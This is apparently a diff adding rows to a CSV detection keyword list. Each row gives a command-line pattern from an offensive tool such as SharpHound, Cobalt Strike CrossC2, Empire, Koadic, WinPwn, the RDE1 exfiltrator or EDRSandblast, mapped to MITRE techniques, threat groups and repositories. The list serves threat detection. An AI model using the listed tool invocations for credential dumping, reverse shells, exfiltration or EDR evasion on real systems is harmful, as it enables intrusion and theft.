+"* --collectionmethods DCOnly*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods GPOLocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods Group*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods LocalGroup*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods LoggedOn*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods ObjectProps*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods PSRemote*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods RDP*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods Session*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* --collectionmethods Trusts*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"* com.blackh4t*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z"
+"* --command * --output payload*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z"
+"* -command *.exe* -technique ccmstp*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"* common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* ComputerDefaults.exe*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"* -ComputerName -ServiceEXE *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"* -config modlishka.json *","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","0","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z"
+"* Configuring Windows Firewall rules to block EDR network access*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"* ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
+"* -consoleoutput -browsercredentials*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"* -consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"* -consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"* -ConType bind *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -ConType reverse *","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --copy-file --source-file *.docx --target-file *.docx --target-volume *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"* core.payload *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"* core.stager *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"* couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --crack-status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* --crawl=*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"* crawler.py -u 
http*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z"
+"* crde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool 
allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in 
Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* crde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z"
+"* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* Cred_Dump.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
+"* credentials /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"* creds-summary.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* CrossC2 Listener*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"* CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"* CrossC2Kit *","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z"
+"* CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
